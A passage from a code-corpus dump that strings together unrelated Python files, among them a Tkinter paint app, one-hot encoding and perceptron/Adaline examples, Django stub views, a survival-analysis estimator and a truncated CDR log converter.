create_rgb_window():\r\n t = Toplevel()\r\n t.title(\"RGB Colour Picker\")\r\n\r\n def change_frame_colour(self):\r\n red = r_var.get()\r\n green = g_var.get()\r\n blue = b_var.get()\r\n\r\n rgb = f'#{red:02x}{green:02x}{blue:02x}'\r\n\r\n colour_frame.config(bg=rgb)\r\n moreColour.config(bg=rgb)\r\n colour_hex.set(rgb)\r\n colourVar.set(rgb)\r\n\r\n colour_frame = Frame(t)\r\n colour_frame.config(bg=\"#000000\")\r\n\r\n r_var = IntVar()\r\n red_scale = Scale(t, troughcolor=\"#ff0000\", variable=r_var, command=change_frame_colour, from_=0, to=255,\r\n label=\"RED\", orient=HORIZONTAL)\r\n\r\n g_var = IntVar()\r\n green_scale = Scale(t, troughcolor=\"#00ff00\", variable=g_var, command=change_frame_colour, from_=0, to=255,\r\n label=\"GREEN\", orient=HORIZONTAL)\r\n\r\n b_var = IntVar()\r\n blue_scale = Scale(t, troughcolor=\"#0000ff\", variable=b_var, command=change_frame_colour, from_=0, to=255,\r\n label=\"BLUE\", orient=HORIZONTAL)\r\n\r\n colour_hex = StringVar()\r\n colour_hex.set(\"#000000\")\r\n colour_label = Label(t, textvariable=colour_hex)\r\n\r\n apply = Button(t, text=\"Apply\", command=t.destroy)\r\n\r\n t.grid()\r\n colour_frame.grid(row=1, rowspan=4, column=2, pady=20, padx=20, ipadx=100, ipady=100)\r\n red_scale.grid(row=1, column=1)\r\n green_scale.grid(row=2, column=1)\r\n blue_scale.grid(row=3, column=1)\r\n colour_label.grid(row=4, column=1)\r\n apply.grid(row=5, column=1, columnspan=2, pady=20)\r\n\r\n t.wait_window()\r\n return colourVar\r\n\r\n\r\n# Canvas Options\r\ndef clear_canvas():\r\n cv.delete(ALL)\r\n\r\n\r\n# MAIN\r\n######################################################################\r\nroot = Tk()\r\nroot.title(\"Paints\")\r\nmainframe = Frame(root)\r\n\r\ncolourFrame = LabelFrame(mainframe, text=\"Colour\")\r\nshapeFrame = LabelFrame(mainframe, text=\"Shape\")\r\nshapeSettingsFrame = LabelFrame(mainframe, text=\"Settings\")\r\n\r\n\r\n# WIDGETS\r\n######################################################################\r\n\r\n# create canvas\r\ncv = Canvas(mainframe, width=800, height=500, bg=\"#ffffff\")\r\ncv.bind(\"\", draw_shape)\r\n\r\n# colour of brush\r\ncolourVar = StringVar()\r\ncolourVar.set(\"#000000\")\r\n\r\ncustomText = StringVar()\r\ncustomText.set(\"Press 'Change Text' Button in Settings to Customize\")\r\n\r\n# preset colours for brush\r\nwhiteColour = Button(colourFrame, bg=\"#ffffff\", command=lambda: change_brush_colour(\"#ffffff\"))\r\nblackColour = Button(colourFrame, bg=\"#000000\", command=lambda: change_brush_colour(\"#000000\"))\r\nredColour = Button(colourFrame, bg=\"#ff0000\", command=lambda: change_brush_colour(\"#ff0000\"))\r\norangeColour = Button(colourFrame, bg=\"#ffaa00\", command=lambda: change_brush_colour(\"#ffaa00\"))\r\nyellowColour = Button(colourFrame, bg=\"#ffff00\", command=lambda: change_brush_colour(\"#ffff00\"))\r\nlimeColour = Button(colourFrame, bg=\"#aaff00\", command=lambda: change_brush_colour(\"#aaff00\"))\r\ngreenColour = Button(colourFrame, bg=\"#00ff00\", command=lambda: change_brush_colour(\"#00ff00\"))\r\nmintColour = Button(colourFrame, bg=\"#00ffaa\", command=lambda: change_brush_colour(\"#00ffaa\"))\r\naquaColour = Button(colourFrame, bg=\"#00ffff\", command=lambda: change_brush_colour(\"#00ffff\"))\r\nskyblueColour = Button(colourFrame, bg=\"#00aaff\", command=lambda: change_brush_colour(\"#00aaff\"))\r\nblueColour = Button(colourFrame, bg=\"#0000ff\", command=lambda: change_brush_colour(\"#0000ff\"))\r\npurpleColour = Button(colourFrame, bg=\"#aa00ff\", command=lambda: change_brush_colour(\"#aa00ff\"))\r\nmagentaColour = Button(colourFrame, bg=\"#ff00ff\", command=lambda: change_brush_colour(\"#ff00ff\"))\r\npinkColour = Button(colourFrame, bg=\"#ff00aa\", command=lambda: change_brush_colour(\"#ff00aa\"))\r\n# custom colour\r\nmoreColour = Button(colourFrame, text=\"More Colours\", command=more_colours)\r\n\r\n# brush size slider\r\nbrushVar = IntVar()\r\nbrushVar.set(5)\r\nbrushSize = Scale(mainframe, variable=brushVar, from_=1, to=50, width=25, length=150,\r\n label=\"BRUSH SIZE\", orient=VERTICAL)\r\n\r\n# shape radio buttons\r\nshapeVar = IntVar()\r\nshapeVar.set(1)\r\nlineRadio = Radiobutton(shapeFrame, variable=shapeVar, text=\"Line\", value=1, command=show_settings)\r\nrectRadio = Radiobutton(shapeFrame, variable=shapeVar, text=\"Rectangle\", value=2, command=show_settings)\r\novalRadio = Radiobutton(shapeFrame, variable=shapeVar, text=\"Oval\", value=3, command=show_settings)\r\ntextRadio = Radiobutton(shapeFrame, variable=shapeVar, text=\"Text\", value=4, command=show_settings)\r\n\r\n# shape settings\r\nwidthLabel = Label(shapeSettingsFrame, text=\"Width\")\r\nheightLabel = Label(shapeSettingsFrame, text=\"Height\")\r\n\r\nwidthVar = IntVar()\r\nwidthVar.set(10)\r\nwidthSpin = Spinbox(shapeSettingsFrame, width=10, textvariable=widthVar, from_=1, to=550)\r\n\r\nheightVar = IntVar()\r\nheightVar.set(10)\r\nheightSpin = Spinbox(shapeSettingsFrame, width=10, textvariable=heightVar, from_=1, to=250)\r\n\r\nchangeTextButton = Button(shapeSettingsFrame, text=\"Change Text\", command=change_text)\r\n\r\nfontVar = IntVar()\r\nfontVar.set(8)\r\nfontSpin = Spinbox(shapeSettingsFrame, width=10, textvariable=fontVar, from_=1, to=50)\r\n\r\n# fill / no fill\r\nfillVar = IntVar()\r\nfillCheck = Checkbutton(mainframe, variable=fillVar, text=\"No fill\", onvalue=1, offvalue=0)\r\n\r\n# canvas options\r\nresizeButton = Button(mainframe, text=\"Resize Canvas\", command=resize_canvas)\r\nclearButton = Button(mainframe, text=\"Clear\", command=clear_canvas)\r\n\r\n\r\n# GRID\r\n######################################################################\r\nmainframe.grid(padx=15, pady=15)\r\n\r\n# Colour frame\r\ncolourFrame.grid(row=1, column=1, sticky=NW)\r\nwhiteColour.grid(row=1, column=1, ipadx=15, ipady=10, padx=5, pady=(0, 5))\r\nblackColour.grid(row=1, column=2, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\nredColour.grid(row=1, column=3, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\norangeColour.grid(row=1, column=4, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\nyellowColour.grid(row=1, column=5, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\nlimeColour.grid(row=1, column=6, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\ngreenColour.grid(row=1, column=7, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\nmintColour.grid(row=1, column=8, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\naquaColour.grid(row=1, column=9, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\nskyblueColour.grid(row=1, column=10, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\nblueColour.grid(row=1, column=11, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\npurpleColour.grid(row=1, column=12, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\nmagentaColour.grid(row=1, column=13, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\npinkColour.grid(row=1, column=14, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\nmoreColour.grid(row=1, column=15, ipadx=15, ipady=10, padx=(0, 5), pady=(0, 5))\r\n\r\n# Options\r\nbrushSize.grid(row=1, rowspan=2, column=3)\r\n\r\nshapeFrame.grid(row=3, column=3)\r\nlineRadio.grid(row=1, sticky=W)\r\nrectRadio.grid(row=2, sticky=W)\r\novalRadio.grid(row=4, sticky=W)\r\ntextRadio.grid(row=5, sticky=W)\r\n\r\n# Canvas\r\ncv.grid(row=2, rowspan=4, column=1, columnspan=2, pady=10, sticky=W)\r\nresizeButton.grid(row=6, column=1, sticky=W)\r\nclearButton.grid(row=6, column=2, sticky=E)\r\n\r\n\r\nroot.mainloop()\r\n","sub_path":"Paints.py","file_name":"Paints.py","file_ext":"py","file_size_in_byte":12022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"298411284","text":"import numpy as np\nx = np.array([3,6,5])\nprint(x.shape) # (3,)\n\n# (1)\nfrom tensorflow.keras.utils import to_categorical\n\nx = to_categorical(x) \nprint(x)\n'''\n 0 1 2 3 4 5 6\n[[0. 0. 0. 1. 0. 0. 0.] --> 3\n [0. 0. 0. 0. 0. 0. 1.] --> 6\n [0. 0. 0. 0. 0. 1. 0.]] --> 5\n '''\nprint(x.shape) # (3, 7)\n\n# (2)\ny = np.array([3,6,5])\nfrom sklearn.preprocessing import OneHotEncoder\n\ny = y.reshape(-1,1)\nprint(y)\n'''\n[[3]\n [6]\n [5]]\n '''\nencoder = OneHotEncoder()\nencoder.fit(y)\ny = encoder.transform(y).toarray() #toarray() : list 를 array로 바꿔준다.\nprint(y)\n'''\n 3 5 6\n[[1. 0. 0.] --> 3\n [0. 0. 1.] --> 6\n [0. 1. 0.]] --> 5\n '''\nprint(y.shape) # (3, 3)","sub_path":"keras/keras22_0_2OneHotEncoder.py","file_name":"keras22_0_2OneHotEncoder.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"568567858","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n\nimport json\n\n#讀取 json 的程式\ndef jsonTextReader(jFP):\n with open(jFP ,\"r\", encoding='utf-8') as f:\n return json.load(f)\n\n#將字串轉為「句子」列表的程式\ndef text2Sentence(tet):\n for i in (\"...\",\"…\"):\n tet=tet.replace(i,\"\")\n for i in (\",\",\"。\",\"、\",\",\"):\n if '2,718' in tet:\n tet=tet.replace('2,718',\"2718\")\n tet=tet.replace(i,\"\")\n tet=tet.replace('2718',\"2,718\")\n tet=tet.split(\"\")[:-1]\n return tet\n\nif __name__== \"__main__\":\n #設定要讀取的 news.json 路徑\n NewsJP = \"./example/news.json\"\n\n #將 news.json 利用 [讀取 json] 的程式打開\n jtext = jsonTextReader(NewsJP)[\"text\"]\n\n #將讀出來的內容字串傳給 [將字串轉為「句子」 列表」]的程式,存為 newsLIST\n newsLIST = text2Sentence(jtext)\n\n #設定要讀取的 test.json 路徑\n TestJP = \"./example/test.json\"\n\n #將 test.json 的 sentenceLIST 內容讀出,存為 testLIST\n testLIST = jsonTextReader(TestJP)[\"sentence\"]\n\n #測試是否達到作業需求\n if newsLIST == testLIST:\n print(\"作業過關!\")\n else:\n print(\"作業不過關,請回到上面修改或是貼文求助!\")\n","sub_path":"week06/week06_40947029S.py","file_name":"week06_40947029S.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"577768804","text":"from django.shortcuts import HttpResponse\nimport json\n\ndef select_volume(request):\n if request.method == \"GET\":\n return HttpResponse(\"error\")\n elif request.method == \"POST\":\n volume_name = request.POST.get('volume_name')\n\n target_info = [\n {'target_name': 'target11111', 'lun_num': 5},\n {'target_name': 'target22222', 'lun_num': 2}\n ]\n\n volume_info = [\n {'volume_name': 'volume1', 'volume_capacity': 200, 'volume_free_cap': 180},\n {'volume_name': 'volume2', 'volume_capacity': 300, 'volume_free_cap': 280},\n {'volume_name': 'volume3', 'volume_capacity': 400, 'volume_free_cap': 380},\n ]\n\n info = {\n 'target_info': target_info,\n 'volume_info': volume_info,\n }\n return HttpResponse(json.dumps(info), content_type='application/json')\n\ndef select_target(request):\n if request.method == \"GET\":\n return HttpResponse(\"error\")\n elif request.method == \"POST\":\n target_name = request.POST.get('target_name')\n\n target_info = [\n {'target_name': 'target11111', 'lun_num': 5},\n {'target_name': 'target22222', 'lun_num': 2}\n ]\n\n return HttpResponse(json.dumps(target_info), content_type='application/json')","sub_path":"web/change_volume.py","file_name":"change_volume.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"639713504","text":"import compas\nfrom compas.datastructures import Mesh\nfrom compas.geometry import centroid_points_xy\nfrom compas_plotters import MeshPlotter\n\nimport compas_libigl as igl\n\nV = [[0, 0, 0], [10, 0, 0], [10, 10, 0], [0, 10, 0], [3, 3, 0], [7, 3, 0], [7, 7, 0], [3, 7, 0]]\nE = [[0, 1], [1, 2], [2, 3], [3, 0], [4, 5], [5, 6], [6, 7], [7, 4], [0, 4], [6, 2]]\nH = [centroid_points_xy(V[4:])]\n\nV2, F2 = igl.conforming_delaunay_triangulation(V, E, H, area=0.5)\n\nmesh = Mesh.from_vertices_and_faces(V2, F2)\n\nlines = []\nfor u, v in E:\n lines.append({'start': V[u], 'end': V[v], 'color': '#ff0000', 'width': 0.5})\n\nplotter = MeshPlotter(mesh, figsize=(8, 5))\nplotter.draw_faces()\nplotter.draw_lines(lines)\nplotter.show()\n","sub_path":"scripts/triangulation.py","file_name":"triangulation.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"38603606","text":"import libdtw as lib\nfrom copy import copy, deepcopy\nfrom tqdm import tqdm_notebook, tqdm\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.ensemble import RandomForestRegressor\nimport pandas as pd\nfrom sksurv.ensemble import GradientBoostingSurvivalAnalysis\nfrom sklearn.preprocessing import MinMaxScaler\nfrom joblib import Parallel, delayed\nimport os\n\n\ndef build_structured_array(data_set):\n \"\"\"\n Starting from a usual dataset, this function creates a structured numpy array of 2-tuples, where\n the first entry represent the 'status' of the entry (censored or no event = False, event = True)\n and the second represents the time to event\n Parameters\n ----------\n data_set: Pandas data frame\n Data set containing at least the length of the online query and its total duration\n\n Returns\n -------\n res : Numpy structured array\n Array suitable to be used by sksurv methods\n \"\"\"\n output = list()\n for idx, row in data_set.iterrows():\n survival_time = row['true_length'] - row['length']\n output.append((True, survival_time))\n res = np.array(output, dtype=[('status', bool), ('time_remaining', 'f8')])\n return res\n\n\ndef generate_dataset_xy(t_ref, t, ongoing_id, D, data, open_ended=True):\n \"\"\"\n Generates a data set relative to the ongoing batch. It takes the time 't' on the ongoing batch,\n the mapped 't_ref' on the reference batch and than every point in the historical batches that\n were mapped to 't_ref'. It adds also the PV values to every entry\n\n Parameters\n ----------\n t_ref : int\n Time instant on the reference batch\n t : int\n Time instant on the query batch\n ongoing_id : string\n ID of the ongoing query\n D : Dtw object\n Dtw object with open-ended information\n data : dict\n Dictionary of the form {batch_ID : list_ov_PVs_dictionaries}\n\n Returns\n -------\n tuple\n (data_set, data_y)\n data_set : Pandas data frame\n Data set containing information about:\n - DTW distance\n - length\n - PV values\n data_y : Numpy structured array\n Structured array suitable to be used with sksurv methods\n \"\"\"\n data_set = list()\n if open_ended:\n data_source = D.data_open_ended['warp_dist'].items()\n else:\n data_source = D.data['warp_dist'].items()\n \n mapped_points = list(filter(lambda x: x[1] == t, D.data_open_ended['warp_dist'][ongoing_id]))\n for (i, j, d) in mapped_points:\n data_point = {'DTW_distance': d,\n 'length': j + 1,\n 'query_id': ongoing_id,\n 'true_length': len(data[ongoing_id][0]['values'])}\n data_set.append(data_point)\n \n\n for _id, warp_dist in D.data['warp_dist'].items():\n mapped_points = list(filter(lambda x: x[0] <= t_ref and x[0] >= t_ref - 10, warp_dist))\n for (i, j, d) in mapped_points:\n data_point = {'DTW_distance': d,\n 'length': j + 1,\n 'query_id': _id,\n 'true_length': len(data[_id][0]['values'])}\n data_set.append(data_point)\n \n mapped_points = list(filter(lambda x: x[0] == t_ref, D.data_open_ended['warp_dist'][_id]))\n for (i, j, d) in mapped_points:\n data_point = {'DTW_distance': d,\n 'length': j + 1,\n 'query_id': _id,\n 'true_length': len(data[_id][0]['values'])}\n data_set.append(data_point)\n \n \n \n data_set = pd.DataFrame(data_set)\n data_set.index = data_set['query_id']\n\n data_y = build_structured_array(data_set)\n data_set.drop(columns=['query_id', 'true_length'], inplace=True)\n\n for _id, row in data_set.iterrows():\n batch = D.data['queries'][_id]\n length = int(row['length'])\n for pv in batch:\n data_set.at[_id, pv['name']] = pv['values'][length - 1]\n\n return (data_set, data_y)\n\n\nclass Estimator:\n \"\"\"\n Methods\n -------\n - __init__\n - fit\n - predict\n - score\n - get_params\n - set_params\n \"\"\"\n\n def __init__(self, dtw_obj, regressor=LinearRegression(), loss='coxph', learning_rate=0.1,\\\n n_estimators=100, max_depth=3, subsample=1.0, random_state=42):\n \"\"\"\n The class needs to be initialized with the Dtw object already trained, the regression model\n to use after the survival analysis model, and all the parameters for the survival analysis\n model\n\n Parameters\n ----------\n dtw_obj : Dtw object\n Trained Dtw object\n regressor : sklearn model\n Sklearn regression model\n loss, learning_rate, n_estimators, max_depth, subsample :\n parameters of the GradientBoostingSurvivalAnalysis method\n Complete DOC : https://scikit-survival.readthedocs.io/en/latest/generated/sksurv.ensemble.GradientBoostingSurvivalAnalysis.html\n random_state : int\n Seed of the pseudo random number generator\n \"\"\"\n np.random.seed(random_state)\n self.regressor = regressor\n self.loss = loss\n self.learning_rate = learning_rate\n self.n_estimators = n_estimators\n self.max_depth = max_depth\n self.subsample = subsample\n self.random_state = random_state\n\n self.dtw_obj = dtw_obj\n\n def fit(self, x_train, y_train):\n \"\"\"\n Fits the survival analysis model to the training data, and prepare the risk data used in the\n predict method by the regression model\n\n Parameters\n ----------\n x_train : pandas data frame\n data set of predictors as returned by generate_dataset_xy()\n y_train : numpy structured array\n Structured array suitable to be used with sksurv methods\n\n Returns\n -------\n Reference to the object itself\n \"\"\"\n self.model = GradientBoostingSurvivalAnalysis(loss=self.loss,\n learning_rate=self.learning_rate,\n n_estimators=self.n_estimators,\n max_depth=self.max_depth,\n subsample=self.subsample,\n random_state=self.random_state)\n\n self.x_train = x_train\n self.y_train = y_train\n\n self.model.fit(self.x_train, self.y_train)\n\n self.data_set = pd.concat([self.x_train, pd.Series(\n data=self.y_train['time_remaining'], index=self.x_train.index, name='time_remaining')], axis=1, sort=False)\n self.data_set['risk'] = self.model.predict(self.x_train)\n\n return self\n\n def predict(self, new_x, by='risk'):\n \"\"\"\n First computes the risk of the new data point, than converts it to a time measure via the\n regression model feeded as input to the class\n\n Parameters\n ----------\n new_x : pandas data frame\n Data frame of the data point to predict\n by : string {'rank', 'risk', 'scaled_risk'}\n Which feature to consider when applying the regression model to predict\n the time-to-end\n\n Returns\n -------\n numpy array\n Array of time-to-end estimates\n\n \"\"\"\n x_new = pd.DataFrame(deepcopy(new_x))\n x_new['risk'] = self.model.predict(x_new)\n query_id = list(x_new.index)[0]\n x_length = len(self.dtw_obj.data['queries'][query_id][0]['values'])\n x_new['time_remaining'] = x_length - x_new['length']\n\n self.data_set_extd = pd.concat([self.data_set, x_new], axis=0, sort=False)\n self.data_set_extd.sort_values(by='risk', ascending=False, inplace=True)\n\n locations = self.data_set_extd.index.get_loc(query_id)\n\n locs = list()\n if type(locations) == slice:\n start, stop = locations.start, locations.stop\n locs.extend([loc for loc in np.arange(start, stop)])\n elif type(locations) == int or type(locations) == np.int64:\n locs = [locations]\n elif type(locations) == np.ndarray:\n locs = np.arange(len(locations))[locations]\n else:\n print('ERROR')\n print(type(locations))\n locs = []\n\n y_values = self.data_set_extd['time_remaining']\n\n if by == 'rank':\n x_values = pd.Series(np.arange(y_values))\n elif by == 'risk':\n x_values = self.data_set_extd['risk']\n elif by == 'scaled_risk':\n scaler = MinMaxScaler()\n x_values = scaler.fit_transform(self.data_set_extd['risk'])\n ests = list()\n\n for loc in locs:\n # print(locs)\n # print([x for x, y in zip(np.arange(len(t_left)), t_left.values)])\n xy = [(x, y) for (x, y) in zip(x_values.values, y_values.values) if x != loc]\n x = np.array([x[0] for x in xy]).reshape(-1, 1)\n y = np.array([x[1] for x in xy])\n # Add possibility for risk as X variable\n reg = self.regressor.fit(X=x, y=np.log1p(y))\n if by == 'scaled_risk':\n ests.append(np.expm1(reg.predict(scaler.transform(x_values.values[loc]))[0]))\n else:\n ests.append(np.expm1(reg.predict(x_values.values[loc])[0]))\n\n return np.array(ests)\n\n def score(self, x_test, y_test):\n \"\"\"\n Computes the mean absolute erros on the test set in input\n\n Parameters\n ----------\n x_test : pandas data frame\n data set of predictors as returned by generate_dataset_xy()\n y_test : numpy structured array\n Structured array suitable to be used with sksurv methods\n\n Returns\n -------\n float\n mean absolute error\n \"\"\"\n y_pred = self.predict(x_test)\n return np.mean(np.abs(y_pred - y_test['time_remaining']))\n\n def get_params(self, deep=True):\n \"\"\"\n Returns the parameters of the class\n\n Parameters:\n deep : boolean\n Inserted only for compatibility with sklearn\n\n Returns\n dict\n Dictionary of the initializing parameters of the Estimator class\n \"\"\"\n return {'dtw_obj': self.dtw_obj,\n 'regressor': self.regressor,\n 'loss': self.loss,\n 'learning_rate': self.learning_rate,\n 'n_estimators': self.n_estimators,\n 'max_depth': self.max_depth,\n 'subsample': self.subsample}\n\n def set_params(self, parameters):\n \"\"\"\n Sets the parameters of the class\n\n Parameters\n ----------\n parameters : dict\n Dictionary of pairs {parameter_name : parameter_value}\n \"\"\"\n for parameter, value in parameters.items():\n setattr(self, parameter, value)\n","sub_path":"final/real_experiment/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":11462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"575112924","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n\nclass Perceptron():\n def __init__(self):\n self.max_iter=1000\n self.eta=0.1\n\n def fit(self,x,y_gt):\n x_1 = np.hstack((x, np.ones((x.shape[0], 1))))\n self.w_=np.random.random(x_1.shape[-1])\n for iter in range(self.max_iter):\n y_pred=self._pred(x_1)\n # print('iteration:',iter,y_gt-y_pred,(y_gt-y_pred)[:,np.newaxis])\n dw_=self.eta*np.sum(np.broadcast_to((y_gt-y_pred)[:,np.newaxis],x_1.shape)*x_1,axis=0)\n print(dw_)\n if np.sum(abs(dw_))<10e-9:\n break\n self.w_+=dw_\n\n def _pred(self,x):\n y_pred = np.sum(x * self.w_, axis=1)\n y_pred = np.array([1 if i > 0 else -1 for i in y_pred])\n return y_pred\n\n def predict(self,x):\n x = np.hstack((x,np.ones((x.shape[0],1))))\n y_pred = self._pred(x)\n return y_pred\n\n\nclass Adaline():\n def __init__(self,eta=0.0001,n_iter=1000):\n self.max_iter=n_iter\n self.eta=eta\n self.w_initialized = False\n self.shuffle = True\n\n def fit(self,x,y_gt):\n x_1 = np.hstack((x, np.ones((x.shape[0], 1))))\n self.w_=np.random.random(x_1.shape[-1])\n self.cost_ = []\n for iter in range(self.max_iter):\n hidden=self.net_input(x_1)\n y_pred=self.activation(hidden)\n # dw_=self.eta*np.sum(np.broadcast_to((y_gt-y_pred)[:,np.newaxis],x_1.shape)*x_1,axis=0)\n dw_=self.eta*np.dot(x_1.T ,y_gt-y_pred)\n print(dw_)\n if np.sum(abs(dw_))<10e-9:\n break\n self.w_+=dw_\n self.cost_.append(np.sum((y_gt-y_pred)**2)/2)\n\n def partial_fit(self, X, y):\n if not self.w_initialized:\n self._initialize_weights(X.shape[1])\n if y.ravel().shape[0] > 1:\n for xi, target in zip(X, y):\n self._update_weights(xi, target)\n else:\n self._update_weights(X, y)\n return self\n\n def predict(self,x):\n x = np.hstack((x,np.ones((x.shape[0],1))))\n y_pred = self.activation(self.net_input(x))\n return np.array([1 if i > 0 else -1 for i in y_pred])\n\n def net_input(self,x):\n return np.dot(x,self.w_)#np.sum(x * self.w_, axis=1)\n\n def activation(self, X):\n return X\n\n def _initialize_weights(self, m):\n self.w_ = np.random.random(1 + m)\n self.w_initialized = True\n\n def _shuffle(self, X, y):\n r = np.random.permutation(len(y))\n return X[r], y[r]\n\ndef generate_fake_data():\n c = Perceptron()\n num_sample_for_each_cls=10\n x0=np.vstack((np.random.normal(10,.5,num_sample_for_each_cls),\n np.random.normal(8,.5,num_sample_for_each_cls),\n np.random.normal(-1,.5,num_sample_for_each_cls),\n np.random.normal(2,.5,num_sample_for_each_cls))).T\n x1=np.vstack((np.random.normal(0,.5,num_sample_for_each_cls),\n np.random.normal(2,.5,num_sample_for_each_cls),\n np.random.normal(5,.5,num_sample_for_each_cls),\n np.random.normal(5,.5,num_sample_for_each_cls))).T\n print(np.random.normal(10,.5,num_sample_for_each_cls).shape,x1.shape)\n x=np.vstack((x0,x1))\n print(x.shape)\n y=np.hstack((np.ones(num_sample_for_each_cls),np.ones(num_sample_for_each_cls)*-1))\n print(y.shape)\n c.fit(x,y)\n\n x0_pred=np.vstack((np.random.normal(10,.5,num_sample_for_each_cls),\n np.random.normal(8,.5,num_sample_for_each_cls),\n np.random.normal(-1,.5,num_sample_for_each_cls),\n np.random.normal(2,.5,num_sample_for_each_cls))).T\n x1_pred=np.vstack((np.random.normal(0,.5,num_sample_for_each_cls),\n np.random.normal(2,.5,num_sample_for_each_cls),\n np.random.normal(5,.5,num_sample_for_each_cls),\n np.random.normal(5,.5,num_sample_for_each_cls))).T\n print(c.predict(np.vstack((x0_pred,x1_pred))))\n\nfrom matplotlib.colors import ListedColormap\ndef plot_decision_regions(X, y, classifier, resolution=0.02):\n # setup marker generator and color map\n markers = ('s', 'x', 'o', '^', 'v')\n colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n cmap = ListedColormap(colors[:len(np.unique(y))])\n # plot the decision surface\n x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\n np.arange(x2_min, x2_max, resolution))\n Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\n Z = Z.reshape(xx1.shape)\n plt.contourf(xx1, xx2, Z, alpha=0.3, cmap=cmap)\n plt.xlim(xx1.min(), xx1.max())\n plt.ylim(xx2.min(), xx2.max())\n # plot class examples\n for idx, cl in enumerate(np.unique(y)):\n plt.scatter(x=X[y == cl, 0],y=X[y == cl, 1],alpha=0.8, c=colors[idx],\n marker=markers[idx], label=cl, edgecolor='black')\n\ndef test_iris_data():\n csv_add='../data/iris.data'\n df =pd.read_csv(csv_add,header=None,encoding='utf-8')\n print(df.head())\n y = df.iloc[0:100, 4].values\n y = np.where(y == 'Iris-setosa', -1, 1)\n X = df.iloc[0:100, [0, 2]].values\n plt.scatter(X[:50, 0], X[:50, 1],color = 'red', marker = 'o', label = 'setosa')\n plt.scatter(X[50:100, 0], X[50:100, 1],color = 'blue', marker = 'x', label = 'versicolor')\n plt.xlabel('sepal length [cm]')\n plt.ylabel('petal length [cm]')\n plt.legend(loc='upper left')\n plt.show()\n\n\n # ppn = Adaline(eta=0.0001)\n # ppn.fit(X,y)\n # plot_decision_regions(X, y, classifier=ppn)\n # plt.show()\n\n X_std=X.copy()\n X_std[:,0]=(X[:,0]-X[:,0].mean())/X[:,0].std()\n X_std[:,1]=(X[:,1]-X[:,1].mean())/X[:,1].std()\n ppn = Adaline(eta=0.01)\n ppn.fit(X_std,y)\n plot_decision_regions(X_std, y, classifier=ppn)\n plt.show()\n\n ada_gd = Adaline(n_iter=20, eta=0.01)\n ada_gd.fit(X_std, y)\n plot_decision_regions(X_std, y, classifier=ada_gd)\n plt.title('Adaline - Gradient Descent')\n plt.xlabel('sepal length [standardized]')\n plt.ylabel('petal length [standardized]')\n plt.legend(loc='upper left')\n plt.tight_layout()\n plt.show()\n plt.plot(range(1, len(ada_gd.cost_) + 1),ada_gd.cost_, marker = 'o')\n plt.xlabel('Epochs')\n plt.ylabel('Sum-squared-error')\n plt.tight_layout()\n plt.show()\ntest_iris_data()","sub_path":"ch02/perceptron_learning.py","file_name":"perceptron_learning.py","file_ext":"py","file_size_in_byte":6437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"79747891","text":"# -*- coding: utf-8 -*-\n\n\"\"\" CDR converting to UTM5 format and parse in UTM5 \"\"\"\n\nimport configparser, subprocess, logging\nfrom os import path, listdir, makedirs\nfrom sys import stdout as cmd_output\n\nclass Cdr:\n _app_dir = path.dirname(path.realpath(__file__))\n _config = configparser.ConfigParser()\n _period = None\n _cdr_upload_dir = None\n _cdr_converted_dir = None\n _parser = None\n _parser_config = None\n\n def __init__(self, period):\n self._config.read(self._app_dir + '/config/dgenerator.conf')\n self._period = '%s_%s' % tuple(period)\n self._cdr_upload_dir = path.join(path.normpath(self._config.get('CDR', 'SourceRootCdrDir')), self._period)\n self._cdr_converted_dir = path.join(path.normpath(self._config.get('CDR', 'ConvertedRootCdrDir')), self._period)\n self._parser = self._config.get('CDR', 'ParserPath')\n self._parser_config = self._config.get('CDR', 'ParserConfigPath')\n\n def _convert(self):\n # Convert CDR files in UTM5 format\n\n if path.isdir(self._cdr_upload_dir) and len(listdir(self._cdr_upload_dir)) != 0:\n if not path.isdir(self._cdr_converted_dir):\n makedirs(self._cdr_converted_dir)\n cdr_count = 1\n for cdr in listdir(self._cdr_upload_dir):\n converted_cdr_name = cdr.replace('.log', '.cdr')\n converted_cdr_lines = []\n line_count = 0\n for line in open(path.join(self._cdr_upload_dir, cdr)):\n temp = line.split()\n converted_cdr_lines.append(\n '%s;%s;%s;%s;%s %s;%s;%s;1\\n' %\n (temp[1],temp[3],temp[6],str(line_count),temp[4],temp[5],temp[0][1:],temp[2]))\n line_count += 1\n converted_cdr_file = 